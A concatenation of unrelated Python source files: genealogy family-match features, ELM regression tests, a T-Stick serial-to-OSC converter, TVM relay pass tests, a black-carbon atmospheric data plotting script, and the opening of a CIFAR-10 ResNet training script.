            elif fmatch[partner]['status'] in common.statEjOK:
                red += 0.5
        except Exception:
            pass
    features.append(green)
    features.append(yellow)
    features.append(red)
    # Child match statuses as fractions of the number of children.
    chstat = defaultdict(int)
    antch = 0.0
    for ch in fmatch['children']:
        antch += 1.0
        if ch['status'] in common.statOK:
            chstat['green'] += 1
        elif ch['status'] in common.statManuell:
            chstat['yellow'] += 1
        elif ch['status'] in common.statEjOK:
            chstat['red'] += 1
        elif ch['status'] == "":
            chstat['white'] += 1
    if antch == 0:
        antch = 1.0  # avoid division by 0
    features.append(float(chstat['green']) / antch)
    features.append(float(chstat['yellow']) / antch)
    features.append(float(chstat['red']) / antch)
    features.append(float(chstat['white']) / antch)
    # Marriage date similarity; dateSim(None, None) supplies the neutral value.
    try:
        features.append(dateSim(work['marriage']['date'], match['marriage']['date']))
    except Exception:
        features.append(dateSim(None, None))
    # Marriage place similarity.
    try:
        features.append(strSim(work['marriage']['place'], match['marriage']['place']))
    except Exception:
        features.append(strSim(None, None))
    return [0.0 if v is None else v for v in features]
#return cleanupVect(features)
def famExtended(work, match, config):
    """famBaseline features plus parent-family match-status features.

    For each partner (husb/wife) the family in which that person appears
    as a child is looked up on both the work and match sides; the status
    of that family match contributes 0.5 to the corresponding colour bucket.
    """
    features = famBaseline(work, match, config)
    green = 0.0
    yellow = 0.0
    red = 0.0
    for partner in ('husb', 'wife'):
        # `except Exception:` (was a bare except) covers partners without a
        # childhood family or without a stored family match on either side.
        try:
            # work side: family where this partner is listed as a child
            tFam = config['families'].find_one({'children': work[partner]['workid']})
            workFamId = tFam['_id']
            # same lookup on the match side
            tFam = config['match_families'].find_one({'children': work[partner]['matchid']})
            matchFamId = tFam['_id']
            # status of the match between those two parent families
            fmatch = config['fam_matches'].find_one({'workid': workFamId, 'matchid': matchFamId})
            if fmatch['status'] in common.statOK:
                green += 0.5
            elif fmatch['status'] in common.statManuell:
                yellow += 0.5
            elif fmatch['status'] in common.statEjOK:
                red += 0.5
        except Exception:
            pass
    features.append(green)
    features.append(yellow)
    features.append(red)
    return [0.0 if v is None else v for v in features]
|
<reponame>ShubhamDiwan/elm<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_regression
----------------------------------
Datasets used were from sklearn.datasets
import numpy as np
from sklearn.datasets import load_boston, load_diabetes
data = load_boston()
data = np.hstack((data["target"].reshape(-1, 1), data["data"]))
np.savetxt("boston.data", data)
data = load_diabetes()
data = np.hstack((data["target"].reshape(-1, 1), data["data"]))
np.savetxt("diabetes.data", data)
"""
import elm
def test_elmk_boston():
    """ELMKernel smoke test on the boston dataset: train/test must not raise."""
    # load dataset
    data = elm.read("tests/data/boston.data")
    # create a regressor
    elmk = elm.ELMKernel()
    try:
        # split data in training and testing sets
        tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
        # train and test
        tr_result = elmk.train(tr_set)
        te_result = elmk.test(te_set)
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit, making the test unkillable.
        ERROR = 1
    else:
        ERROR = 0
    assert (ERROR == 0)
def test_elmk_diabetes():
    """ELMKernel smoke test on the diabetes dataset: train/test must not raise."""
    # load dataset
    data = elm.read("tests/data/diabetes.data")
    # create a regressor
    elmk = elm.ELMKernel()
    try:
        # split data in training and testing sets
        tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
        # train and test
        tr_result = elmk.train(tr_set)
        te_result = elmk.test(te_set)
    except Exception:
        # Was a bare `except:` — narrowed so interrupts propagate.
        ERROR = 1
    else:
        ERROR = 0
    assert (ERROR == 0)
def test_elmr_boston():
    """ELMRandom smoke test on the boston dataset: train/test must not raise."""
    # load dataset
    data = elm.read("tests/data/boston.data")
    # create a regressor
    elmr = elm.ELMRandom()
    try:
        # split data in training and testing sets
        tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
        # train and test
        tr_result = elmr.train(tr_set)
        te_result = elmr.test(te_set)
    except Exception:
        # Was a bare `except:` — narrowed so interrupts propagate.
        ERROR = 1
    else:
        ERROR = 0
    assert (ERROR == 0)
def test_elmr_diabetes():
    """ELMRandom smoke test on the diabetes dataset: train/test must not raise."""
    # load dataset
    data = elm.read("tests/data/diabetes.data")
    # create a regressor
    elmr = elm.ELMRandom()
    try:
        # split data in training and testing sets
        tr_set, te_set = elm.split_sets(data, training_percent=.8, perm=True)
        # train and test
        tr_result = elmr.train(tr_set)
        te_result = elmr.test(te_set)
    except Exception:
        # Was a bare `except:` — narrowed so interrupts propagate.
        ERROR = 1
    else:
        ERROR = 0
    assert (ERROR == 0)
|
<gh_stars>1-10
# Python code to convert T-Stick serial port messages to OSC
# Author: <NAME> (IDMIL, 2019)
import sys
import serial
import collections
import struct
from apscheduler.schedulers.background import BackgroundScheduler
from bitstring import BitArray
import argparse
# parse argument to set OSC to send/receive T-Stick data
parser = argparse.ArgumentParser(
    description='Convert T-Stick serial port messages into OSC messages.',
    formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--serialport", "-s", default="/dev/ttyUSB0",
                    metavar='', help="The T-Stick's serial port")
args = parser.parse_args()

# Opening T-Stick serial port (115200 baud; dsrdtr=1 keeps DTR asserted)
tstick = serial.Serial(args.serialport, 115200, dsrdtr=1)

# checking system byteorder
byteorder = sys.byteorder

# Global device id used to pick the per-model decoder; populated by
# get_tstick_id() once the device identifies itself.
tstick_id = 0
def resend(address, *args):
    """Forward an incoming OSC message's payload back over the serial port.

    NOTE(review): `args` is a tuple here, while pyserial's write() expects
    a bytes-like object — confirm the caller's payload shape.
    """
    tstick.write(args)
def heartbeat():
    """Send the 's' status-request byte so the device keeps streaming."""
    status_request = 's'.encode('utf-8')
    tstick.write(status_request)
def receive_serial():
    """ Receive T-Stick serial data and make it available
    as "serial_data" variable. The data is namedtuple.

    Frames end with byte 100; byte 101 escapes the following data byte.
    """
    flag = False
    msg = []
    while True:
        # Read exactly one byte per iteration and unpack it to an int.
        # The original called tstick.read() twice per loop (dropping every
        # other byte), compared the 1-tuple returned by struct.unpack
        # against the ints 100/101 (never equal, so framing never fired),
        # and used `is` for a string compare (sys.byteorder is 'little').
        # Host byte order is irrelevant for a single byte.
        byte = struct.unpack("B", tstick.read())[0]
        if not flag:
            if byte == 100:
                # End of frame: refresh the device id, then dispatch the
                # message to the decoder for that model.
                information = get_tstick_id(*msg)
                if(tstick_id == 173):
                    serial_data = sort_and_send_173(*msg)
                elif(tstick_id == 10 or
                     tstick_id == 12 or
                     tstick_id == 24 or
                     tstick_id == 171):
                    serial_data = sort_and_send_2G(*msg)
                elif(tstick_id == 15):
                    serial_data = sort_and_send_2GX(*msg)
                msg.clear()
            elif byte == 101:
                # Escape byte: treat the *next* byte as literal data.
                flag = True
            else:
                msg.append(byte)
        else:
            msg.append(byte)
            flag = False
def bit_conversion(byte1, byte2):
    """Combine two bytes into an unsigned 16-bit value (big-endian)."""
    return (byte1 << 8) + byte2
def bit_ext_conversion(byte1, byte2):
    """Combine two bytes into a sign-extended 16-bit value.

    NOTE(review): values above 32767 are reduced by 65535, not 65536, so
    0xFFFF maps to 0 rather than -1 — confirm this offset matches the
    firmware's encoding.
    """
    combined = (byte1 << 8) | byte2
    if combined > 32767:
        return combined - 65535
    return combined
def get_tstick_id(*msg):
    """Parse a device-information frame (message type 0).

    Frame layout: [0, id_hi, id_lo, fw_hi, fw_lo, extra...]. Updates the
    module-level `tstick_id` and returns a namedtuple
    (tstick_id, firmware, info_list); returns 0 for too-short frames and
    None for non-type-0 frames (as before).
    """
    named_return = collections.namedtuple(
        'tstick_information', 'tstick_id firmware info_list')
    if msg[0] == 0:
        # Bytes 1-4 are needed for the id and firmware words; the original
        # guard (len < 3) still allowed an IndexError on msg[3]/msg[4].
        if len(msg) < 5:
            return 0
        global tstick_id
        tstick_id = bit_conversion(msg[1], msg[2])
        firmware = bit_conversion(msg[3], msg[4])
        info_list = [tstick_id, firmware]
        # Any trailing bytes are appended verbatim as extra info.
        if len(msg) > 5:
            for i in msg[5:]:
                info_list.append(i)
        return named_return(tstick_id, firmware, info_list)
def sort_and_send_173(*msg):
    """ Route T-Stick messages for T-Stick #173. """
    kind = msg[0]
    if kind == 0:
        return 0
    if kind == 1:
        as_named = collections.namedtuple('tstick_sensor', 'rawcapsense')
        return as_named(msg[1:])
    if kind == 2:
        as_named = collections.namedtuple(
            'tstick_sensor', 'rawaccel rawgyro rawpressure rawpiezo')
        # Decode eight signed 16-bit words from the byte pairs msg[1..16]:
        # accel x/y/z, gyro x/y/z, pressure, piezo.
        words = [bit_ext_conversion(msg[i], msg[i + 1])
                 for i in range(1, 17, 2)]
        return as_named(words[0:3], words[3:6], words[6], words[7])
    if kind == 3:
        as_named = collections.namedtuple('tstick_sensor', 'rawmag')
        # Three signed 16-bit magnetometer axes.
        axes = [bit_ext_conversion(msg[i], msg[i + 1])
                for i in range(1, 7, 2)]
        return as_named(axes)
    if kind == 4:
        return 0
def sort_and_send_2G(*msg):
    """ Route T-Stick messages for T-Stick 2G series: 010, 012, 024, 171. """
    kind = msg[0]
    if kind == 0:
        return 0
    if kind == 1:
        as_named = collections.namedtuple('tstick_sensor', 'rawcapsense')
        return as_named(msg[1:])
    if kind == 2:
        as_named = collections.namedtuple('tstick_sensor', 'rawjab')
        return as_named(msg[1:])
    if kind == 3:
        as_named = collections.namedtuple('tstick_sensor', 'rawtap')
        return as_named(msg[1:])
    if kind == 4:
        as_named = collections.namedtuple(
            'tstick_sensor', 'rawaccel rawpressure rawpiezo')
        # Five unsigned 16-bit words: accel x/y/z, pressure, piezo.
        words = [bit_conversion(msg[i], msg[i + 1])
                 for i in range(1, 11, 2)]
        return as_named(words[0:3], words[3], words[4])
def sort_and_send_2GX(*msg):
    """ Route T-Stick messages for T-Stick #015. """
    kind = msg[0]
    if kind == 0:
        return 0
    if kind == 1:
        as_named = collections.namedtuple('tstick_sensor', 'rawcapsense')
        return as_named(msg[1:])
    if kind == 2:
        as_named = collections.namedtuple('tstick_sensor', 'rawjab')
        return as_named(msg[1:])
    if kind == 3:
        as_named = collections.namedtuple('tstick_sensor', 'rawtap')
        return as_named(msg[1:])
    if kind == 4:
        as_named = collections.namedtuple(
            'tstick_sensor', 'rawaccel rawpressure rawpiezo rawairpressure rawrange rawldr1 rawldr2')
        # Nine unsigned 16-bit words: accel x/y/z, pressure, piezo,
        # air pressure, range, ldr1, ldr2.
        words = [bit_conversion(msg[i], msg[i + 1])
                 for i in range(1, 19, 2)]
        return as_named(words[0:3], words[3], words[4],
                        words[5], words[6], words[7], words[8])
def cook_touch_soprano(*raw):
    """Expand raw capsense bytes into a flat list of '0'/'1' characters."""
    bits = "".join(format(b, '08b') for b in raw)
    return list(bits)
def tstick_wakeup():
    """ Setting heartbeat to run every second """
    # A background scheduler pings the device ('s') once per second so it
    # keeps streaming sensor data while the main thread reads the port.
    scheduler = BackgroundScheduler()
    scheduler.add_job(heartbeat, 'interval', seconds=1)
    scheduler.start()
if __name__ == '__main__':
    # Start the heartbeat scheduler, then block in the serial read loop.
    tstick_wakeup()
    receive_serial()
    sys.exit()
|
<reponame>zhanghaohit/incubator-tvm
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from tvm import relay
from tvm.relay import transform
def run_combine_parallel(expr, min_num_branches=3):
    """Apply CombineParallelDense to *expr* and return its main function."""
    module = relay.Module.from_expr(expr)
    module = transform.CombineParallelDense(min_num_branches)(module)
    return module["main"]
def run_opt_pass(expr, opt_pass):
    """Run a single relay pass over *expr* and return its main function."""
    assert isinstance(opt_pass, transform.Pass)
    module = relay.Module.from_expr(expr)
    return opt_pass(module)["main"]
def test_combine_parallel_dense():
    """Simple testcase. One dense cannot be combined due to shape mismatch"""
    def before(x, w1, w2, w3, w4):
        # Four parallel dense ops sharing input x; w3 has a different
        # output dim, so only y1/y2/y4 are combinable.
        args = [x, w1, w2, w3, w4]
        y1 = relay.nn.dense(x, w1)
        y2 = relay.nn.dense(x, w2)
        # y3 cannot be combined
        y3 = relay.nn.dense(x, w3)
        y4 = relay.nn.dense(x, w4)
        y = relay.Tuple((y1, y2, y3, y4))
        return relay.Function(args, y)

    def expected(x, w1, w2, w3, w4):
        # use a fixed order of args so alpha equal check can pass
        args = [x, w1, w2, w3, w4]
        # The three combinable branches become one batch_matmul that is
        # split back into the individual results.
        x_stacked = relay.stack((x, x, x), axis=0)
        w = relay.stack((w1, w2, w4), axis=0)
        y = relay.nn.batch_matmul(x_stacked, w)
        (y1, y2, y4) = relay.split(y, 3)
        y1 = relay.squeeze(y1, [0])
        y2 = relay.squeeze(y2, [0])
        y4 = relay.squeeze(y4, [0])
        # y3 cannot be combined
        y3 = relay.nn.dense(x, w3)
        y = relay.Tuple((y1, y2, y3, y4))
        return relay.Function(args, y)

    def check(i, j, k):
        x = relay.var("x", shape=(i, k))
        w1 = relay.var("w1", shape=(j, k))
        w2 = relay.var("w2", shape=(j, k))
        # w3's first dim differs, blocking combination for y3.
        w3 = relay.var("w3", shape=(j + 1, k))
        w4 = relay.var("w4", shape=(j, k))
        y_before = before(x, w1, w2, w3, w4)
        y = run_opt_pass(y_before,
                         transform.CombineParallelDense(min_num_branches=2))
        y_expected = expected(x, w1, w2, w3, w4)
        y_expected = run_opt_pass(y_expected, transform.InferType())
        assert relay.analysis.alpha_equal(y, y_expected)

    check(3, 5, 4)
    check(100, 200, 300)
def test_combine_parallel_dense_biasadd():
    """Testcase of combining dense + 1d biasadd"""
    def before(x, w1, w2, b1, b2):
        # Two parallel dense branches, each followed by a bias add.
        args = [x, w1, w2, b1, b2]
        y1 = relay.nn.dense(x, w1)
        y2 = relay.nn.dense(x, w2)
        y1 = relay.add(y1, b1)
        y2 = relay.add(y2, b2)
        y = relay.Tuple((y1, y2))
        return relay.Function(args, y)
    def expected(x, w1, w2, b1, b2, is_2d_bias):
        args = [x, w1, w2, b1, b2]
        x_stacked = relay.stack((x, x), axis=0)
        w = relay.stack((w1, w2), axis=0)
        y = relay.nn.batch_matmul(x_stacked, w)
        # 1-D biases need a leading axis before stacking; 2-D biases already
        # have the (i, j) shape that broadcasts against the batched result.
        if not is_2d_bias:
            b1 = relay.expand_dims(b1, 0)
            b2 = relay.expand_dims(b2, 0)
        b = relay.stack((b1, b2), axis=0)
        y = relay.add(y, b)
        (y1, y2) = relay.split(y, 2)
        y1 = relay.squeeze(y1, [0])
        y2 = relay.squeeze(y2, [0])
        y = relay.Tuple((y1, y2))
        return relay.Function(args, y)
    def check(i, j, k, is_2d_bias):
        # i = batch rows, j = output units, k = reduction dimension.
        x = relay.var("x", shape=(i, k))
        w1 = relay.var("w1", shape=(j, k))
        w2 = relay.var("w2", shape=(j, k))
        if is_2d_bias:
            b1 = relay.var("b1", shape=(i, j))
            b2 = relay.var("b2", shape=(i, j))
        else:
            b1 = relay.var("b1", shape=(j,))
            b2 = relay.var("b2", shape=(j,))
        y_before = before(x, w1, w2, b1, b2)
        y = run_opt_pass(y_before,
                         transform.CombineParallelDense(min_num_branches=2))
        y_expected = expected(x, w1, w2, b1, b2, is_2d_bias)
        y_expected = run_opt_pass(y_expected, transform.InferType())
        assert relay.analysis.alpha_equal(y, y_expected)
    check(3, 5, 4, False)
    check(100, 200, 300, False)
    check(3, 5, 4, True)
    check(100, 200, 300, True)
def test_combine_parallel_dense_biasadd_scale_reshape():
    """Testcase of combining dense + 1d biasadd + multiply with non-fused reshape"""
    def before(x, w1, w2, b1, b2, scale1, scale2, newshape):
        # dense -> add -> multiply is combinable; the trailing reshape is not
        # fused and must remain per-branch after the combine.
        args = [x, w1, w2, b1, b2, scale1, scale2]
        y1 = relay.nn.dense(x, w1)
        y2 = relay.nn.dense(x, w2)
        y1 = relay.add(y1, b1)
        y2 = relay.add(y2, b2)
        y1 = relay.multiply(y1, scale1)
        y2 = relay.multiply(y2, scale2)
        y1 = relay.reshape(y1, newshape=newshape)
        y2 = relay.reshape(y2, newshape=newshape)
        y = relay.Tuple((y1, y2))
        return relay.Function(args, y)
    def expected(x, w1, w2, b1, b2, scale1, scale2, newshape):
        args = [x, w1, w2, b1, b2, scale1, scale2]
        x_stacked = relay.stack((x, x), axis=0)
        w = relay.stack((w1, w2), axis=0)
        y = relay.nn.batch_matmul(x_stacked, w)
        # Biases and scales both gain a leading axis and are stacked so they
        # broadcast against the batched matmul output.
        b1 = relay.expand_dims(b1, 0)
        b2 = relay.expand_dims(b2, 0)
        b = relay.stack((b1, b2), axis=0)
        y = relay.add(y, b)
        scale1 = relay.expand_dims(scale1, 0)
        scale2 = relay.expand_dims(scale2, 0)
        scale = relay.stack((scale1, scale2), axis=0)
        y = relay.multiply(y, scale)
        (y1, y2) = relay.split(y, 2)
        y1 = relay.squeeze(y1, [0])
        y2 = relay.squeeze(y2, [0])
        # reshape stays outside the combined region, one per branch.
        y1 = relay.reshape(y1, newshape=newshape)
        y2 = relay.reshape(y2, newshape=newshape)
        y = relay.Tuple((y1, y2))
        return relay.Function(args, y)
    def check(i, j, k, scale1, scale2, newshape):
        x = relay.var("x", shape=(i, k))
        w1 = relay.var("w1", shape=(j, k))
        w2 = relay.var("w2", shape=(j, k))
        b1 = relay.var("b1", shape=(j,))
        b2 = relay.var("b2", shape=(j,))
        scale1 = relay.var("scale1", shape=(1,))
        scale2 = relay.var("scale2", shape=(1,))
        y_before = before(x, w1, w2, b1, b2, scale1, scale2, newshape)
        y = run_opt_pass(y_before,
                         transform.CombineParallelDense(min_num_branches=2))
        y_expected = expected(x, w1, w2, b1, b2, scale1, scale2, newshape)
        y_expected = run_opt_pass(y_expected, transform.InferType())
        assert relay.analysis.alpha_equal(y, y_expected)
    check(3, 5, 4, 0.5, 0.25, (1, 1, 15))
    check(100, 200, 300, 0.5, 0.25, (1, 1, 200))
if __name__ == "__main__":
    # Run all CombineParallelDense tests when executed as a script.
    test_combine_parallel_dense()
    test_combine_parallel_dense_biasadd()
    test_combine_parallel_dense_biasadd_scale_reshape()
|
<filename>WHI_2012_mass_concs_SP2_filter_GC.py<gh_stars>1-10
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
from matplotlib import dates
import os
import pickle
from datetime import datetime
from pprint import pprint
import sys
from datetime import timedelta
import calendar
import mysql.connector
# NOTE: this is a Python 2 script (print statements below).
#database connection
# NOTE(review): hard-coded root credentials with a '<PASSWORD>' placeholder —
# must be filled in (or moved to config) before the script can run.
cnx = mysql.connector.connect(user='root', password='<PASSWORD>', host='localhost', database='black_carbon')
cursor = cnx.cursor()
max_display_conc = 1000
correction_factor_for_massdistr = 1.85#set to 1 and deal with each cluster separately 1.96 #corrects for only sampling part of the mass distr +- 5%
R = 8.3144621 # in m3*Pa/(K*mol)
#import WHI met data for STP corrections
# Each entry: [date_PST, pressure_Pa]; rows without a parseable pressure are skipped.
WHI_pressures = []
with open('C:/Users/<NAME>/Documents/Data/WHI long term record/WHI station met and other data/whi__met_summer_2009-2012.txt', 'r') as f:
    f.readline()  # skip header line
    for line in f:
        newline = line.split('\t')
        date_PST = datetime.strptime(newline[0], '%d/%m/%Y %H:%M')
        try:
            pressure_mbar = float(newline[5])
            pressure_Pa = pressure_mbar*100 #100Pa/mbar
            WHI_pressures.append([date_PST,pressure_Pa])
        except:
            continue  # missing / non-numeric pressure field
# Collect 2012 pressures (this `temp` scratch list is rebound later for masses).
temp = []
for line in WHI_pressures:
    date = line[0]
    pressure = line[1]
    if date.year == 2012:
        temp.append(pressure)
# Room temperatures in Kelvin, 2012 only: [date_PST, temp_K].
WHI_room_temps = []
with open('C:/Users/<NAME>/Documents/Data/WHI long term record/WHI station met and other data/whi__rt_stackflow_summer_2009-2012.txt', 'r') as f:
    f.readline()  # skip header line
    for line in f:
        newline = line.split('\t')
        date_PST = datetime.strptime(newline[0], '%d/%m/%Y %H:%M')
        try:
            temp_degC = float(newline[1])
            temp_K = temp_degC + 273.15
            if date_PST.year == 2012:
                WHI_room_temps.append([date_PST,temp_K])
        except:
            continue  # missing / non-numeric temperature field
#set up arrays
full_record = []
record_list = []
record_list_uncorrSTP = []
record_dict = {}
record_dict_uncorrSTP = {}
spike_times = []
#get BC data and remove spikes
# Spike-filter state: previous record timestamp / mass concentration, and the
# time gap after which the spike filter resets.
prev_ts = datetime.strptime('2000/01/01', '%Y/%m/%d')
prev_bc_mass_conc = 1000
time_jump = timedelta(hours=1)
# Walk the binned SP2 pickle files, STP-correct each 10-min record, drop
# spikes, and bucket the surviving rows by hour into record_dict(s).
os.chdir('D:/2012/WHI_UBCSP2/Binary/10 min bins - 2012 calib - AD corrected/',)
for file in os.listdir('.'):
    if file.endswith('.binpckl'):
        print file
        f = open(file, 'r')
        single_bc_record = pickle.load(f)
        f.close()
        i=0
        for row in single_bc_record:
            #row info: interval_mid_time, incand_number_conc, BC_mass_conc, interval_sampling_duration, interval_incand_count
            #set units
            record_date = datetime.utcfromtimestamp(float(row[0]))
            record_hour = datetime(record_date.year,record_date.month,record_date.day,record_date.hour)
            number_conc = row[1]*1e6 #converts incand #/cm3 to #/m3
            #for BC mass the conversion from /cm3 to /m3 and from fg to ng cancel each other out, so no manipulation is necessary
            #get STP correction factor - pressure term
            # Advance through the (chronological) pressure list until the head
            # entry is within 1 h of this record; WHI_pressure tracks that head.
            # NOTE(review): WHI_pressure is only assigned inside this while loop —
            # if the very first record predates the met data it stays unbound.
            number_pressures = len(WHI_pressures)
            if number_pressures:
                WHI_pressure_time = WHI_pressures[0][0]
                while record_date > WHI_pressure_time + timedelta(hours=1):
                    WHI_pressures.pop(0)
                    if len(WHI_pressures):
                        WHI_pressure_time = WHI_pressures[0][0]
                        WHI_pressure = WHI_pressures[0][1]
                        continue
                    else:
                        break
                number_pressures = len(WHI_pressures)
            #get STP correction factor - temp term
            # Same advancing-head scheme for the room-temperature series.
            number_temps = len(WHI_room_temps)
            if number_temps:
                WHI_temp_time = WHI_room_temps[0][0]
                while record_date > WHI_temp_time + timedelta(hours=1):
                    WHI_room_temps.pop(0)
                    if len(WHI_room_temps):
                        WHI_temp_time = WHI_room_temps[0][0]
                        WHI_temp = WHI_room_temps[0][1]
                        continue
                    else:
                        break
                number_temps = len(WHI_room_temps)
            #calc correction factor
            # Ideal-gas volumes: ambient vs standard (101325 Pa, 273 K).
            volume_ambient = (R*WHI_temp)/(WHI_pressure)
            volume_STP = volume_ambient*(WHI_pressure/101325)*(273/WHI_temp)
            correction_factor_for_STP = volume_ambient/volume_STP
            #determine if bc mass conc is a spike from snow machines etc
            BC_mass_conc = row[2]
            #if record_date.year == 2012 and BC_mass_conc > 200.:
            #	continue
            # Keep the row when it is <6x the previous value, small (<10), or the
            # previous record is more than an hour old (filter reset).
            if (BC_mass_conc < 6*prev_bc_mass_conc) or (BC_mass_conc < 10.0) or (record_date > prev_ts +time_jump): #check for spikes
                if BC_mass_conc < 2000: #set abs max
                    #correcting the rows that are not spikes for the portion of the mass distr that we're not sampling
                    #we have to check the LL and UL though, becuase some very few are nans (from binning code) and these mess up all subsequent calcs
                    #row[2] = mass conc, row[3] = LL, row[4] = UL
                    median = row[2]  # NOTE(review): assigned but never used
                    BC_mass_corr = row[2]*correction_factor_for_massdistr*correction_factor_for_STP
                    BC_mass_uncorr = row[2]*correction_factor_for_massdistr
                    new_row = [number_conc,BC_mass_corr]
                    new_row_uncorr = [number_conc,BC_mass_uncorr]
                    if record_hour not in record_dict:
                        record_dict[record_hour] = []
                    record_dict[record_hour].append(new_row)
                    if record_hour not in record_dict_uncorrSTP:
                        record_dict_uncorrSTP[record_hour] = []
                    record_dict_uncorrSTP[record_hour].append(new_row_uncorr)
                    prev_bc_mass_conc = BC_mass_conc
                    i=0
            else:
                spike_times.append(record_date)
            prev_ts = record_date
            i+=1
# Collapse each hour's rows to mean number/mass concentrations; `temp`
# accumulates July 3-11 masses for a quick summary print.
temp = []
for hour in record_dict:
    mean_number = np.mean([row[0] for row in record_dict[hour]])
    mean_mass = np.mean([row[1] for row in record_dict[hour]])
    record_list.append([hour,mean_number,mean_mass])
    if hour.month == 7 and hour.day in [3,4,5,6,7,8,9,10,11]:
        temp.append(mean_mass)
print 'mean 3-11', np.mean(temp)
record_list.sort()
# Same hourly averaging for the non-STP-corrected series.
for hour in record_dict_uncorrSTP:
    mean_number = np.mean([row[0] for row in record_dict_uncorrSTP[hour]])
    mean_mass = np.mean([row[1] for row in record_dict_uncorrSTP[hour]])
    record_list_uncorrSTP.append([hour,mean_number,mean_mass])
record_list_uncorrSTP.sort()
# Unpack into parallel plotting arrays (matplotlib date numbers + values).
BC_dates_2012 = [dates.date2num(row[0]) for row in record_list]
BC_number_conc_2012 = [row[1] for row in record_list]
BC_mass_conc_2012 = [row[2] for row in record_list]
BC_dates_2012_uncorr = [dates.date2num(row[0]) for row in record_list_uncorrSTP]
BC_number_conc_2012_uncorr = [row[1] for row in record_list_uncorrSTP]
BC_mass_conc_2012_uncorr = [row[2] for row in record_list_uncorrSTP]
#########EC filter data#######
file = 'C:/Users/<NAME>/Documents/Data/WHI long term record/filter EC/WSL_OCEC_Database_(Aug.2008-May.2012)_QAQC_PI_(to RL).txt'
EC_filter_data = []
with open(file, 'r') as f:
    # Skip the 19-line file header.
    for i in range(0,19):
        f.readline()
    for line in f:
        newline = line.split('\t')
        start_date = datetime.strptime(newline[1], '%d/%m/%Y %H:%M') #PST PDT???
        stop_date = datetime.strptime(newline[2], '%d/%m/%Y %H:%M')
        try:
            EC_conc = float(newline[9])*1000 # orig is in ugC/m3 so *1000 to get ng/m3
        except:
            print 'no value'
            continue
        # Timestamp each filter sample at the midpoint of its interval.
        date = (stop_date-start_date)/2 + start_date
        EC_filter_data.append([date,EC_conc])
EC_dates = [dates.date2num(row[0]) for row in EC_filter_data]
EC_mass_concs = [row[1] for row in EC_filter_data]
######GC 1 h values
#
##database connection
#cnx = mysql.connector.connect(user='root', password='<PASSWORD>', host='localhost', database='black_carbon')
#cursor = cnx.cursor()
#
#cursor.execute(('''SELECT *
# FROM whi_gc_and_sp2_1h_mass_concs
# ''')
# )
#data_1h = cursor.fetchall()
#
#times_PST = []
#meas = []
#GC = []
#for row in data_1h:
# ts = row[1]
# gc = row[3]
#
# ts_datetime = datetime.utcfromtimestamp(ts)
# times_PST.append(dates.date2num(ts_datetime+timedelta(hours=-8)))
# GC.append(gc)
#
#cnx.close()
####plotting
#os.chdir('C:/Users/<NAME>/Documents/Data/EC Siberian Fire paper/')
#file = open('WHI_rBC_record_July2012.txt', 'w')
#file.write('interval_mid_time_(PST)'+ '\t' +'incand_number_conc(#/m3)'+ '\t' +' BC_mass_conc(ng/m3)'+ '\n')
#
#for row in record_list:
# line = '\t'.join(str(x) for x in row)
# file.write(line + '\n')
#
#file.close()
# Plot the STP-corrected SP2 series against the EC filter points for
# the April-May 2012 window.
fig = plt.figure(figsize=(12,6))
hfmt = dates.DateFormatter('%b')
hfmt = dates.DateFormatter('%m-%d')  # second assignment wins: month-day tick labels
display_month_interval = 1
ax1 = plt.subplot2grid((1,1), (0,0))
ax1.plot(BC_dates_2012,BC_mass_conc_2012, color='g', marker = '.',label='SP2 corrected to STP')
#ax1.plot(BC_dates_2012_uncorr,BC_mass_conc_2012_uncorr, color='grey', marker = '.',label='SP2 uncorrected')
ax1.scatter(EC_dates,EC_mass_concs, color='r', marker = 'o',s=26,label='EC Filters')
#ax1.scatter(times_PST,GC, color='g', marker = '.',label='GEOS-Chem')
ax1.xaxis.set_major_formatter(hfmt)
ax1.xaxis.set_major_locator(dates.DayLocator(interval = display_month_interval))
ax1.xaxis.set_visible(True)
ax1.set_ylabel('rBC mass concentration (ng/m3 - STP)')
plt.text(0.05, 0.9,'2012', transform=ax1.transAxes,fontsize=18)
#ax1.set_ylim(0, 250)
#ax1.set_xlim(dates.date2num(datetime.strptime('2012/07/20 12:00', '%Y/%m/%d %H:%M')), dates.date2num(datetime.strptime('2012/07/30', '%Y/%m/%d')))
ax1.set_ylim(0, 320)
ax1.set_xlim(dates.date2num(datetime.strptime('2012/04/01 12:00', '%Y/%m/%d %H:%M')), dates.date2num(datetime.strptime('2012/05/31', '%Y/%m/%d')))
plt.legend()
plt.show()
|
<filename>main.py
import time
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from resnet import ResNet50Base, ResNet50OneGPU, ResNet50TwoGPUs, ResNet50SixGPUs
# from utils import progress_bar
import copy
if __name__=="__main__":
    # CIFAR-10 per-channel normalization constants (mean / std).
    transform_train = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
    ])
    transform_test = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
    ])
    trainset = torchvision.datasets.CIFAR10(
        root='./data', train=True, download=True, transform=transform_train)
    trainloader = torch.utils.data.DataLoader(
        trainset, batch_size=100, shuffle=True, num_workers=2)
    testset = torchvision.datasets.CIFAR10(
        root='./data', train=False, download=True, transform=transform_test)
    testloader = torch.utils.data.DataLoader(
        testset, batch_size=100, shuffle=False, num_workers=2)
    loss_fn = nn.CrossEntropyLoss()
    # Build the base model once, then deep-copy its six parts into each
    # placement so all three configurations start from identical weights.
